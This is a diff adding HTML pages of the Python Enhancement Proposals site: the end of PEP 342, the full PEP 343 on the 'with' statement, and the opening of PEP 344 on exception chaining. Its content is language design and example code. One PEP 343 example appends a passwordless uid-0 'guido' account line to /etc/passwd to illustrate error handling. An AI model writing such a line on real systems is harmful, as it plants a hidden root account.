    +                self.schedule(stack[0], stack[1], value)
    +
    +            # else: this pseudothread has ended
    +
    +        self.queue.append(resume)
    +
    +
    +
  6. +
  7. A simple echo server, and code to run it using a trampoline (presumes the +existence of nonblocking_read, nonblocking_write, and other I/O +coroutines, that e.g. raise ConnectionLost if the connection is +closed):
    # coroutine function that echos data back on a connected
    +# socket
    +#
    +def echo_handler(sock):
    +    while True:
    +        try:
    +            data = yield nonblocking_read(sock)
    +            yield nonblocking_write(sock, data)
    +        except ConnectionLost:
    +            pass  # exit normally if connection lost
    +
    +# coroutine function that listens for connections on a
    +# socket, and then launches a service "handler" coroutine
    +# to service the connection
    +#
    +def listen_on(trampoline, sock, handler):
    +    while True:
    +        # get the next incoming connection
    +        connected_socket = yield nonblocking_accept(sock)
    +
    +        # start another coroutine to handle the connection
    +        trampoline.add( handler(connected_socket) )
    +
    +# Create a scheduler to manage all our coroutines
    +t = Trampoline()
    +
    +# Create a coroutine instance to run the echo_handler on
    +# incoming connections
    +#
    +server = listen_on(
    +    t, listening_socket("localhost","echo"), echo_handler
    +)
    +
    +# Add the coroutine to the scheduler
    +t.add(server)
    +
    +# loop forever, accepting connections and servicing them
    +# "in parallel"
    +#
    +t.run()
    +
    +
    +
  8. +
+
+
+

Reference Implementation

+

A prototype patch implementing all of the features described in this PEP is +available as SourceForge patch #1223381 (https://bugs.python.org/issue1223381).

+

This patch was committed to CVS 01-02 August 2005.

+
+
+

Acknowledgements

+

Raymond Hettinger (PEP 288) and Samuele Pedroni (PEP 325) first formally +proposed the ideas of communicating values or exceptions into generators, and +the ability to close generators. Timothy Delaney suggested the title of this +PEP, and Steven Bethard helped edit a previous version. See also the +Acknowledgements section of PEP 340.

+
+
+

References

+

TBD.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0342.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0343/index.html b/pep-0343/index.html new file mode 100644 index 00000000000..f9bc754ae45 --- /dev/null +++ b/pep-0343/index.html @@ -0,0 +1,1067 @@ + + + + + + + + PEP 343 – The “with” Statement | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 343 – The “with” Statement

+
+
Author:
+
Guido van Rossum, Alyssa Coghlan
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
13-May-2005
+
Python-Version:
+
2.5
+
Post-History:
+
02-Jun-2005, 16-Oct-2005, 29-Oct-2005, 23-Apr-2006, 01-May-2006, +30-Jul-2006
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP adds a new statement “with” to the Python language to make +it possible to factor out standard uses of try/finally statements.

+

In this PEP, context managers provide __enter__() and __exit__() +methods that are invoked on entry to and exit from the body of the +with statement.

+
+
+

Author’s Note

+

This PEP was originally written in first person by Guido, and +subsequently updated by Alyssa (Nick) Coghlan to reflect later discussion +on python-dev. Any first person references are from Guido’s +original.

+

Python’s alpha release cycle revealed terminology problems in this +PEP and in the associated documentation and implementation [13]. +The PEP stabilised around the time of the first Python 2.5 beta +release.

+

Yes, the verb tense is messed up in a few places. We’ve been +working on this PEP for over a year now, so things that were +originally in the future are now in the past :)

+
+
+

Introduction

+

After a lot of discussion about PEP 340 and alternatives, I +decided to withdraw PEP 340 and proposed a slight variant on PEP +310. After more discussion, I have added back a mechanism for +raising an exception in a suspended generator using a throw() +method, and a close() method which throws a new GeneratorExit +exception; these additions were first proposed on python-dev in +[2] and universally approved of. I’m also changing the keyword to +‘with’.

+

After acceptance of this PEP, the following PEPs were rejected due +to overlap:

+
    +
  • PEP 310, Reliable Acquisition/Release Pairs. This is the +original with-statement proposal.
  • +
  • PEP 319, Python Synchronize/Asynchronize Block. Its use cases +can be covered by the current PEP by providing suitable +with-statement controllers: for ‘synchronize’ we can use the +“locking” template from example 1; for ‘asynchronize’ we can use +a similar “unlocking” template. I don’t think having an +“anonymous” lock associated with a code block is all that +important; in fact it may be better to always be explicit about +the mutex being used.
  • +
+

PEP 340 and PEP 346 also overlapped with this PEP, but were +voluntarily withdrawn when this PEP was submitted.

+

Some discussion of earlier incarnations of this PEP took place on +the Python Wiki [3].

+
+
+

Motivation and Summary

+

PEP 340, Anonymous Block Statements, combined many powerful ideas: +using generators as block templates, adding exception handling and +finalization to generators, and more. Besides praise it received +a lot of opposition from people who didn’t like the fact that it +was, under the covers, a (potential) looping construct. This +meant that break and continue in a block-statement would break or +continue the block-statement, even if it was used as a non-looping +resource management tool.

+

But the final blow came when I read Raymond Chen’s rant about +flow-control macros [1]. Raymond argues convincingly that hiding +flow control in macros makes your code inscrutable, and I find +that his argument applies to Python as well as to C. I realized +that PEP 340 templates can hide all sorts of control flow; for +example, its example 4 (auto_retry()) catches exceptions and +repeats the block up to three times.

+

However, the with-statement of PEP 310 does not hide control +flow, in my view: while a finally-suite temporarily suspends the +control flow, in the end, the control flow resumes as if the +finally-suite wasn’t there at all.

+

Remember, PEP 310 proposes roughly this syntax (the “VAR =” part is +optional):

+
with VAR = EXPR:
+    BLOCK
+
+
+

which roughly translates into this:

+
VAR = EXPR
+VAR.__enter__()
+try:
+    BLOCK
+finally:
+    VAR.__exit__()
+
+
+

Now consider this example:

+
with f = open("/etc/passwd"):
+    BLOCK1
+BLOCK2
+
+
+

Here, just as if the first line was “if True” instead, we know +that if BLOCK1 completes without an exception, BLOCK2 will be +reached; and if BLOCK1 raises an exception or executes a non-local +goto (a break, continue or return), BLOCK2 is not reached. The +magic added by the with-statement at the end doesn’t affect this.

+

(You may ask, what if a bug in the __exit__() method causes an +exception? Then all is lost – but this is no worse than with +other exceptions; the nature of exceptions is that they can happen +anywhere, and you just have to live with that. Even if you +write bug-free code, a KeyboardInterrupt exception can still cause +it to exit between any two virtual machine opcodes.)

+

This argument almost led me to endorse PEP 310, but I had one idea +left from the PEP 340 euphoria that I wasn’t ready to drop: using +generators as “templates” for abstractions like acquiring and +releasing a lock or opening and closing a file is a powerful idea, +as can be seen by looking at the examples in that PEP.

+

Inspired by a counter-proposal to PEP 340 by Phillip Eby I tried +to create a decorator that would turn a suitable generator into an +object with the necessary __enter__() and __exit__() methods. +Here I ran into a snag: while it wasn’t too hard for the locking +example, it was impossible to do this for the opening example. +The idea was to define the template like this:

+
@contextmanager
+def opening(filename):
+    f = open(filename)
+    try:
+        yield f
+    finally:
+        f.close()
+
+
+

and used it like this:

+
with f = opening(filename):
+    ...read data from f...
+
+
+

The problem is that in PEP 310, the result of calling EXPR is +assigned directly to VAR, and then VAR’s __exit__() method is +called upon exit from BLOCK1. But here, VAR clearly needs to +receive the opened file, and that would mean that __exit__() would +have to be a method on the file.

+

While this can be solved using a proxy class, this is awkward and +made me realize that a slightly different translation would make +writing the desired decorator a piece of cake: let VAR receive the +result from calling the __enter__() method, and save the value of +EXPR to call its __exit__() method later. Then the decorator can +return an instance of a wrapper class whose __enter__() method +calls the generator’s next() method and returns whatever next() +returns; the wrapper instance’s __exit__() method calls next() +again but expects it to raise StopIteration. (Details below in +the section Optional Generator Decorator.)

+

So now the final hurdle was that the PEP 310 syntax:

+
with VAR = EXPR:
+    BLOCK1
+
+
+

would be deceptive, since VAR does not receive the value of +EXPR. Borrowing from PEP 340, it was an easy step to:

+
with EXPR as VAR:
+    BLOCK1
+
+
+

Additional discussion showed that people really liked being able +to “see” the exception in the generator, even if it was only to +log it; the generator is not allowed to yield another value, since +the with-statement should not be usable as a loop (raising a +different exception is marginally acceptable). To enable this, a +new throw() method for generators is proposed, which takes one to +three arguments representing an exception in the usual fashion +(type, value, traceback) and raises it at the point where the +generator is suspended.

+

Once we have this, it is a small step to proposing another +generator method, close(), which calls throw() with a special +exception, GeneratorExit. This tells the generator to exit, and +from there it’s another small step to proposing that close() be +called automatically when the generator is garbage-collected.

+

Then, finally, we can allow a yield-statement inside a try-finally +statement, since we can now guarantee that the finally-clause will +(eventually) be executed. The usual cautions about finalization +apply – the process may be terminated abruptly without finalizing +any objects, and objects may be kept alive forever by cycles or +memory leaks in the application (as opposed to cycles or leaks in +the Python implementation, which are taken care of by GC).

+

Note that we’re not guaranteeing that the finally-clause is +executed immediately after the generator object becomes unused, +even though this is how it will work in CPython. This is similar +to auto-closing files: while a reference-counting implementation +like CPython deallocates an object as soon as the last reference +to it goes away, implementations that use other GC algorithms do +not make the same guarantee. This applies to Jython, IronPython, +and probably to Python running on Parrot.

+

(The details of the changes made to generators can now be found in +PEP 342 rather than in the current PEP)

+
+
+

Use Cases

+

See the Examples section near the end.

+
+
+

Specification: The ‘with’ Statement

+

A new statement is proposed with the syntax:

+
with EXPR as VAR:
+    BLOCK
+
+
+

Here, ‘with’ and ‘as’ are new keywords; EXPR is an arbitrary +expression (but not an expression-list) and VAR is a single +assignment target. It can not be a comma-separated sequence of +variables, but it can be a parenthesized comma-separated +sequence of variables. (This restriction makes a future extension +possible of the syntax to have multiple comma-separated resources, +each with its own optional as-clause.)

+

The “as VAR” part is optional.

+

The translation of the above statement is:

+
mgr = (EXPR)
+exit = type(mgr).__exit__  # Not calling it yet
+value = type(mgr).__enter__(mgr)
+exc = True
+try:
+    try:
+        VAR = value  # Only if "as VAR" is present
+        BLOCK
+    except:
+        # The exceptional case is handled here
+        exc = False
+        if not exit(mgr, *sys.exc_info()):
+            raise
+        # The exception is swallowed if exit() returns true
+finally:
+    # The normal and non-local-goto cases are handled here
+    if exc:
+        exit(mgr, None, None, None)
+
+
+

Here, the lowercase variables (mgr, exit, value, exc) are internal +variables and not accessible to the user; they will most likely be +implemented as special registers or stack positions.

+

The details of the above translation are intended to prescribe the +exact semantics. If either of the relevant methods are not found +as expected, the interpreter will raise AttributeError, in the +order that they are tried (__exit__, __enter__). +Similarly, if any of the calls raises an exception, the effect is +exactly as it would be in the above code. Finally, if BLOCK +contains a break, continue or return statement, the __exit__() +method is called with three None arguments just as if BLOCK +completed normally. (I.e. these “pseudo-exceptions” are not seen +as exceptions by __exit__().)

+

If the “as VAR” part of the syntax is omitted, the “VAR =” part of +the translation is omitted (but mgr.__enter__() is still called).

+

The calling convention for mgr.__exit__() is as follows. If the +finally-suite was reached through normal completion of BLOCK or +through a non-local goto (a break, continue or return statement in +BLOCK), mgr.__exit__() is called with three None arguments. If +the finally-suite was reached through an exception raised in +BLOCK, mgr.__exit__() is called with three arguments representing +the exception type, value, and traceback.

+

IMPORTANT: if mgr.__exit__() returns a “true” value, the exception +is “swallowed”. That is, if it returns “true”, execution +continues at the next statement after the with-statement, even if +an exception happened inside the with-statement. However, if the +with-statement was left via a non-local goto (break, continue or +return), this non-local return is resumed when mgr.__exit__() +returns regardless of the return value. The motivation for this +detail is to make it possible for mgr.__exit__() to swallow +exceptions, without making it too easy (since the default return +value, None, is false and this causes the exception to be +re-raised). The main use case for swallowing exceptions is to +make it possible to write the @contextmanager decorator so +that a try/except block in a decorated generator behaves exactly +as if the body of the generator were expanded in-line at the place +of the with-statement.

+

The motivation for passing the exception details to __exit__(), as +opposed to the argument-less __exit__() from PEP 310, was given by +the transactional() use case, example 3 below. The template in +that example must commit or roll back the transaction depending on +whether an exception occurred or not. Rather than just having a +boolean flag indicating whether an exception occurred, we pass the +complete exception information, for the benefit of an +exception-logging facility for example. Relying on sys.exc_info() +to get at the exception information was rejected; sys.exc_info() +has very complex semantics and it is perfectly possible that it +returns the exception information for an exception that was caught +ages ago. It was also proposed to add an additional boolean to +distinguish between reaching the end of BLOCK and a non-local +goto. This was rejected as too complex and unnecessary; a +non-local goto should be considered unexceptional for the purposes +of a database transaction roll-back decision.

+

To facilitate chaining of contexts in Python code that directly +manipulates context managers, __exit__() methods should not +re-raise the error that is passed in to them. It is always the +responsibility of the caller of the __exit__() method to do any +reraising in that case.

+

That way, if the caller needs to tell whether the __exit__() +invocation failed (as opposed to successfully cleaning up before +propagating the original error), it can do so.

+

If __exit__() returns without an error, this can then be +interpreted as success of the __exit__() method itself (regardless +of whether or not the original error is to be propagated or +suppressed).

+

However, if __exit__() propagates an exception to its caller, this +means that __exit__() itself has failed. Thus, __exit__() +methods should avoid raising errors unless they have actually +failed. (And allowing the original error to proceed isn’t a +failure.)

+
+
+

Transition Plan

+

In Python 2.5, the new syntax will only be recognized if a future +statement is present:

+
from __future__ import with_statement
+
+
+

This will make both ‘with’ and ‘as’ keywords. Without the future +statement, using ‘with’ or ‘as’ as an identifier will cause a +Warning to be issued to stderr.

+

In Python 2.6, the new syntax will always be recognized; ‘with’ +and ‘as’ are always keywords.

+
+
+

Generator Decorator

+

With PEP 342 accepted, it is possible to write a decorator +that makes it possible to use a generator that yields exactly once +to control a with-statement. Here’s a sketch of such a decorator:

+
class GeneratorContextManager(object):
+
+   def __init__(self, gen):
+       self.gen = gen
+
+   def __enter__(self):
+       try:
+           return self.gen.next()
+       except StopIteration:
+           raise RuntimeError("generator didn't yield")
+
+   def __exit__(self, type, value, traceback):
+       if type is None:
+           try:
+               self.gen.next()
+           except StopIteration:
+               return
+           else:
+               raise RuntimeError("generator didn't stop")
+       else:
+           try:
+               self.gen.throw(type, value, traceback)
+               raise RuntimeError("generator didn't stop after throw()")
+           except StopIteration:
+               return True
+           except:
+               # only re-raise if it's *not* the exception that was
+               # passed to throw(), because __exit__() must not raise
+               # an exception unless __exit__() itself failed.  But
+               # throw() has to raise the exception to signal
+               # propagation, so this fixes the impedance mismatch
+               # between the throw() protocol and the __exit__()
+               # protocol.
+               #
+               if sys.exc_info()[1] is not value:
+                   raise
+
+def contextmanager(func):
+   def helper(*args, **kwds):
+       return GeneratorContextManager(func(*args, **kwds))
+   return helper
+
+
+

This decorator could be used as follows:

+
@contextmanager
+def opening(filename):
+   f = open(filename) # IOError is untouched by GeneratorContext
+   try:
+       yield f
+   finally:
+       f.close() # Ditto for errors here (however unlikely)
+
+
+

A robust implementation of this decorator will be made +part of the standard library.

+
+
+

Context Managers in the Standard Library

+

It would be possible to endow certain objects, like files, +sockets, and locks, with __enter__() and __exit__() methods so +that instead of writing:

+
with locking(myLock):
+    BLOCK
+
+
+

one could write simply:

+
with myLock:
+    BLOCK
+
+
+

I think we should be careful with this; it could lead to mistakes +like:

+
f = open(filename)
+with f:
+    BLOCK1
+with f:
+    BLOCK2
+
+
+

which does not do what one might think (f is closed before BLOCK2 +is entered).

+

OTOH such mistakes are easily diagnosed; for example, the +generator context decorator above raises RuntimeError when a +second with-statement calls f.__enter__() again. A similar error +can be raised if __enter__ is invoked on a closed file object.

+

For Python 2.5, the following types have been identified as +context managers:

+
- file
+- thread.LockType
+- threading.Lock
+- threading.RLock
+- threading.Condition
+- threading.Semaphore
+- threading.BoundedSemaphore
+
+
+

A context manager will also be added to the decimal module to +support using a local decimal arithmetic context within the body +of a with statement, automatically restoring the original context +when the with statement is exited.

+
+
+

Standard Terminology

+

This PEP proposes that the protocol consisting of the __enter__() +and __exit__() methods be known as the “context management protocol”, +and that objects that implement that protocol be known as “context +managers”. [4]

+

The expression immediately following the with keyword in the +statement is a “context expression” as that expression provides the +main clue as to the runtime environment the context manager +establishes for the duration of the statement body.

+

The code in the body of the with statement and the variable name +(or names) after the as keyword don’t really have special terms at +this point in time. The general terms “statement body” and “target +list” can be used, prefixing with “with” or “with statement” if the +terms would otherwise be unclear.

+

Given the existence of objects such as the decimal module’s +arithmetic context, the term “context” is unfortunately ambiguous. +If necessary, it can be made more specific by using the terms +“context manager” for the concrete object created by the context +expression and “runtime context” or (preferably) “runtime +environment” for the actual state modifications made by the context +manager. When simply discussing use of the with statement, the +ambiguity shouldn’t matter too much as the context expression fully +defines the changes made to the runtime environment. +The distinction is more important when discussing the mechanics of +the with statement itself and how to go about actually implementing +context managers.

+
+
+

Caching Context Managers

+

Many context managers (such as files and generator-based contexts) +will be single-use objects. Once the __exit__() method has been +called, the context manager will no longer be in a usable state +(e.g. the file has been closed, or the underlying generator has +finished execution).

+

Requiring a fresh manager object for each with statement is the +easiest way to avoid problems with multi-threaded code and nested +with statements trying to use the same context manager. It isn’t +coincidental that all of the standard library context managers +that support reuse come from the threading module - they’re all +already designed to deal with the problems created by threaded +and nested usage.

+

This means that in order to save a context manager with particular +initialisation arguments to be used in multiple with statements, it +will typically be necessary to store it in a zero-argument callable +that is then called in the context expression of each statement +rather than caching the context manager directly.

+

When this restriction does not apply, the documentation of the +affected context manager should make that clear.

+
+
+

Resolved Issues

+

The following issues were resolved by BDFL approval (and a lack +of any major objections on python-dev).

+
    +
  1. What exception should GeneratorContextManager raise when the +underlying generator-iterator misbehaves? The following quote is +the reason behind Guido’s choice of RuntimeError for both this +and for the generator close() method in PEP 342 (from [8]):

    “I’d rather not introduce a new exception class just for this +purpose, since it’s not an exception that I want people to catch: +I want it to turn into a traceback which is seen by the +programmer who then fixes the code. So now I believe they +should both raise RuntimeError. +There are some precedents for that: it’s raised by the core +Python code in situations where endless recursion is detected, +and for uninitialized objects (and for a variety of +miscellaneous conditions).”

    +
  2. +
  3. It is fine to raise AttributeError instead of TypeError if the +relevant methods aren’t present on a class involved in a with +statement. The fact that the abstract object C API raises +TypeError rather than AttributeError is an accident of history, +rather than a deliberate design decision [11].
  4. +
  5. Objects with __enter__/__exit__ methods are called “context +managers” and the decorator to convert a generator function +into a context manager factory is contextlib.contextmanager. +There were some other suggestions [15] during the 2.5 release +cycle but no compelling arguments for switching away from the +terms that had been used in the PEP implementation were made.
  6. +
+
+
+

Rejected Options

+

For several months, the PEP prohibited suppression of exceptions +in order to avoid hidden flow control. Implementation +revealed this to be a right royal pain, so Guido restored the +ability [12].

+

Another aspect of the PEP that caused no end of questions and +terminology debates was providing a __context__() method that +was analogous to an iterable’s __iter__() method [5] [7] [9]. +The ongoing problems [10] [12] with explaining what it was and why +it was and how it was meant to work eventually lead to Guido +killing the concept outright [14] (and there was much rejoicing!).

+

The notion of using the PEP 342 generator API directly to define +the with statement was also briefly entertained [6], but quickly +dismissed as making it too difficult to write non-generator +based context managers.

+
+
+

Examples

+

The generator based examples rely on PEP 342. Also, some of the +examples are unnecessary in practice, as the appropriate objects, +such as threading.RLock, are able to be used directly in with +statements.

+

The tense used in the names of the example contexts is not +arbitrary. Past tense (“-ed”) is used when the name refers to an +action which is done in the __enter__ method and undone in the +__exit__ method. Progressive tense (“-ing”) is used when the name +refers to an action which is to be done in the __exit__ method.

+
    +
  1. A template for ensuring that a lock, acquired at the start of a +block, is released when the block is left:
    @contextmanager
    +def locked(lock):
    +    lock.acquire()
    +    try:
    +        yield
    +    finally:
    +        lock.release()
    +
    +
    +

    Used as follows:

    +
    with locked(myLock):
    +    # Code here executes with myLock held.  The lock is
    +    # guaranteed to be released when the block is left (even
    +    # if via return or by an uncaught exception).
    +
    +
    +
  2. +
  3. A template for opening a file that ensures the file is closed +when the block is left:
    @contextmanager
    +def opened(filename, mode="r"):
    +    f = open(filename, mode)
    +    try:
    +        yield f
    +    finally:
    +        f.close()
    +
    +
    +

    Used as follows:

    +
    with opened("/etc/passwd") as f:
    +    for line in f:
    +        print line.rstrip()
    +
    +
    +
  4. +
  5. A template for committing or rolling back a database +transaction:
    @contextmanager
    +def transaction(db):
    +    db.begin()
    +    try:
    +        yield None
    +    except:
    +        db.rollback()
    +        raise
    +    else:
    +        db.commit()
    +
    +
    +
  6. +
  7. Example 1 rewritten without a generator:
    class locked:
    +   def __init__(self, lock):
    +       self.lock = lock
    +   def __enter__(self):
    +       self.lock.acquire()
    +   def __exit__(self, type, value, tb):
    +       self.lock.release()
    +
    +
    +

    (This example is easily modified to implement the other +relatively stateless examples; it shows that it is easy to avoid +the need for a generator if no special state needs to be +preserved.)

    +
  8. +
  9. Redirect stdout temporarily:
    @contextmanager
    +def stdout_redirected(new_stdout):
    +    save_stdout = sys.stdout
    +    sys.stdout = new_stdout
    +    try:
    +        yield None
    +    finally:
    +        sys.stdout = save_stdout
    +
    +
    +

    Used as follows:

    +
    with opened(filename, "w") as f:
    +    with stdout_redirected(f):
    +        print "Hello world"
    +
    +
    +

    This isn’t thread-safe, of course, but neither is doing this +same dance manually. In single-threaded programs (for example, +in scripts) it is a popular way of doing things.

    +
  10. +
  11. A variant on opened() that also returns an error condition:
    @contextmanager
    +def opened_w_error(filename, mode="r"):
    +    try:
    +        f = open(filename, mode)
    +    except IOError, err:
    +        yield None, err
    +    else:
    +        try:
    +            yield f, None
    +        finally:
    +            f.close()
    +
    +
    +

    Used as follows:

    +
    with opened_w_error("/etc/passwd", "a") as (f, err):
    +    if err:
    +        print "IOError:", err
    +    else:
    +        f.write("guido::0:0::/:/bin/sh\n")
    +
    +
    +
  12. +
  13. Another useful example would be an operation that blocks +signals. The use could be like this:
    import signal
    +
    +with signal.blocked():
    +    # code executed without worrying about signals
    +
    +
    +

    An optional argument might be a list of signals to be blocked; +by default all signals are blocked. The implementation is left +as an exercise to the reader.

    +
  14. +
  15. Another use for this feature is the Decimal context. Here’s a +simple example, after one posted by Michael Chermside:
    import decimal
    +
    +@contextmanager
    +def extra_precision(places=2):
    +    c = decimal.getcontext()
    +    saved_prec = c.prec
    +    c.prec += places
    +    try:
    +        yield None
    +    finally:
    +        c.prec = saved_prec
    +
    +
    +

    Sample usage (adapted from the Python Library Reference):

    +
    def sin(x):
    +    "Return the sine of x as measured in radians."
    +    with extra_precision():
    +        i, lasts, s, fact, num, sign = 1, 0, x, 1, x, 1
    +        while s != lasts:
    +            lasts = s
    +            i += 2
    +            fact *= i * (i-1)
    +            num *= x * x
    +            sign *= -1
    +            s += num / fact * sign
    +    # The "+s" rounds back to the original precision,
    +    # so this must be outside the with-statement:
    +    return +s
    +
    +
    +
  16. +
  17. Here’s a simple context manager for the decimal module:
    @contextmanager
    +def localcontext(ctx=None):
    +    """Set a new local decimal context for the block"""
    +    # Default to using the current context
    +    if ctx is None:
    +        ctx = getcontext()
    +    # We set the thread context to a copy of this context
    +    # to ensure that changes within the block are kept
    +    # local to the block.
    +    newctx = ctx.copy()
    +    oldctx = decimal.getcontext()
    +    decimal.setcontext(newctx)
    +    try:
    +        yield newctx
    +    finally:
    +        # Always restore the original context
    +        decimal.setcontext(oldctx)
    +
    +
    +

    Sample usage:

    +
    from decimal import localcontext, ExtendedContext
    +
    +def sin(x):
    +    with localcontext() as ctx:
    +        ctx.prec += 2
    +        # Rest of sin calculation algorithm
    +        # uses a precision 2 greater than normal
    +    return +s # Convert result to normal precision
    +
    +def sin(x):
    +    with localcontext(ExtendedContext):
    +        # Rest of sin calculation algorithm
    +        # uses the Extended Context from the
    +        # General Decimal Arithmetic Specification
    +    return +s # Convert result to normal context
    +
    +
    +
  18. +
  19. A generic “object-closing” context manager:
    class closing(object):
    +    def __init__(self, obj):
    +        self.obj = obj
    +    def __enter__(self):
    +        return self.obj
    +    def __exit__(self, *exc_info):
    +        try:
    +            close_it = self.obj.close
    +        except AttributeError:
    +            pass
    +        else:
    +            close_it()
    +
    +
    +

    This can be used to deterministically close anything with a +close method, be it file, generator, or something else. It +can even be used when the object isn’t guaranteed to require +closing (e.g., a function that accepts an arbitrary +iterable):

    +
    # emulate opening():
    +with closing(open("argument.txt")) as contradiction:
    +   for line in contradiction:
    +       print line
    +
    +# deterministically finalize an iterator:
    +with closing(iter(data_source)) as data:
    +   for datum in data:
    +       process(datum)
    +
    +
    +

    (Python 2.5’s contextlib module contains a version +of this context manager)

    +
  20. +
  21. PEP 319 gives a use case for also having a released() +context to temporarily release a previously acquired lock; +this can be written very similarly to the locked context +manager above by swapping the acquire() and release() calls:
    class released:
    +  def __init__(self, lock):
    +      self.lock = lock
    +  def __enter__(self):
    +      self.lock.release()
    +  def __exit__(self, type, value, tb):
    +      self.lock.acquire()
    +
    +
    +

    Sample usage:

    +
    with my_lock:
    +    # Operations with the lock held
    +    with released(my_lock):
    +        # Operations without the lock
    +        # e.g. blocking I/O
    +    # Lock is held again here
    +
    +
    +
  22. +
  23. A “nested” context manager that automatically nests the +supplied contexts from left-to-right to avoid excessive +indentation:
    @contextmanager
    +def nested(*contexts):
    +    exits = []
    +    vars = []
    +    try:
    +        try:
    +            for context in contexts:
    +                exit = context.__exit__
    +                enter = context.__enter__
    +                vars.append(enter())
    +                exits.append(exit)
    +            yield vars
    +        except:
    +            exc = sys.exc_info()
    +        else:
    +            exc = (None, None, None)
    +    finally:
    +        while exits:
    +            exit = exits.pop()
    +            try:
    +                exit(*exc)
    +            except:
    +                exc = sys.exc_info()
    +            else:
    +                exc = (None, None, None)
    +        if exc != (None, None, None):
    +            # sys.exc_info() may have been
    +            # changed by one of the exit methods
    +            # so provide explicit exception info
    +            raise exc[0], exc[1], exc[2]
    +
    +
    +

    Sample usage:

    +
    with nested(a, b, c) as (x, y, z):
    +    # Perform operation
    +
    +
    +

    Is equivalent to:

    +
    with a as x:
    +    with b as y:
    +        with c as z:
    +            # Perform operation
    +
    +
    +

    (Python 2.5’s contextlib module contains a version +of this context manager)

    +
  24. +
+
+
+

Reference Implementation

+

This PEP was first accepted by Guido at his EuroPython +keynote, 27 June 2005. +It was accepted again later, with the __context__ method added. +The PEP was implemented in Subversion for Python 2.5a1 +The __context__() method was removed in Python 2.5b1

+
+
+

Acknowledgements

+

Many people contributed to the ideas and concepts in this PEP, +including all those mentioned in the acknowledgements for PEP 340 +and PEP 346.

+

Additional thanks goes to (in no meaningful order): Paul Moore, +Phillip J. Eby, Greg Ewing, Jason Orendorff, Michael Hudson, +Raymond Hettinger, Walter Dörwald, Aahz, Georg Brandl, Terry Reedy, +A.M. Kuchling, Brett Cannon, and all those that participated in the +discussions on python-dev.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0343.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0344/index.html b/pep-0344/index.html new file mode 100644 index 00000000000..f222c1aba14 --- /dev/null +++ b/pep-0344/index.html @@ -0,0 +1,649 @@ + + + + + + + + PEP 344 – Exception Chaining and Embedded Tracebacks | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 344 – Exception Chaining and Embedded Tracebacks

+
+
Author:
+
Ka-Ping Yee
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
12-May-2005
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Numbering Note

+

This PEP has been renumbered to PEP 3134. The text below is the last version +submitted under the old number.

+
+
+

Abstract

+

This PEP proposes three standard attributes on exception instances: the +__context__ attribute for implicitly chained exceptions, the +__cause__ attribute for explicitly chained exceptions, and the +__traceback__ attribute for the traceback. A new raise ... from +statement sets the __cause__ attribute.

+
+
+

Motivation

+

During the handling of one exception (exception A), it is possible that another +exception (exception B) may occur. In today’s Python (version 2.4), if this +happens, exception B is propagated outward and exception A is lost. In order +to debug the problem, it is useful to know about both exceptions. The +__context__ attribute retains this information automatically.

+

Sometimes it can be useful for an exception handler to intentionally re-raise +an exception, either to provide extra information or to translate an exception +to another type. The __cause__ attribute provides an explicit way to +record the direct cause of an exception.

+

In today’s Python implementation, exceptions are composed of three parts: the +type, the value, and the traceback. The sys module, exposes the current +exception in three parallel variables, exc_type, exc_value, and +exc_traceback, the sys.exc_info() function returns a tuple of these +three parts, and the raise statement has a three-argument form accepting +these three parts. Manipulating exceptions often requires passing these three +things in parallel, which can be tedious and error-prone. Additionally, the +except statement can only provide access to the value, not the traceback. +Adding the __traceback__ attribute to exception values makes all the +exception information accessible from a single place.

+
+
+

History

+

Raymond Hettinger [1] raised the issue of masked exceptions on Python-Dev in +January 2003 and proposed a PyErr_FormatAppend() function that C modules +could use to augment the currently active exception with more information. +Brett Cannon [2] brought up chained exceptions again in June 2003, prompting +a long discussion.

+

Greg Ewing [3] identified the case of an exception occurring in a finally +block during unwinding triggered by an original exception, as distinct from +the case of an exception occurring in an except block that is handling the +original exception.

+

Greg Ewing [4] and Guido van Rossum [5], and probably others, have +previously mentioned adding a traceback attribute to Exception instances. +This is noted in PEP 3000.

+

This PEP was motivated by yet another recent Python-Dev reposting of the same +ideas [6] [7].

+
+
+

Rationale

+

The Python-Dev discussions revealed interest in exception chaining for two +quite different purposes. To handle the unexpected raising of a secondary +exception, the exception must be retained implicitly. To support intentional +translation of an exception, there must be a way to chain exceptions +explicitly. This PEP addresses both.

+

Several attribute names for chained exceptions have been suggested on +Python-Dev [2], including cause, antecedent, reason, original, +chain, chainedexc, xc_chain, excprev, previous and +precursor. For an explicitly chained exception, this PEP suggests +__cause__ because of its specific meaning. For an implicitly chained +exception, this PEP proposes the name __context__ because the intended +meaning is more specific than temporal precedence but less specific than +causation: an exception occurs in the context of handling another exception.

+

This PEP suggests names with leading and trailing double-underscores for these +three attributes because they are set by the Python VM. Only in very special +cases should they be set by normal assignment.

+

This PEP handles exceptions that occur during except blocks and +finally blocks in the same way. Reading the traceback makes it clear +where the exceptions occurred, so additional mechanisms for distinguishing +the two cases would only add unnecessary complexity.

+

This PEP proposes that the outermost exception object (the one exposed for +matching by except clauses) be the most recently raised exception for +compatibility with current behaviour.

+

This PEP proposes that tracebacks display the outermost exception last, +because this would be consistent with the chronological order of tracebacks +(from oldest to most recent frame) and because the actual thrown exception is +easier to find on the last line.

+

To keep things simpler, the C API calls for setting an exception will not +automatically set the exception’s __context__. Guido van Rossum has +expressed concerns with making such changes [8].

+

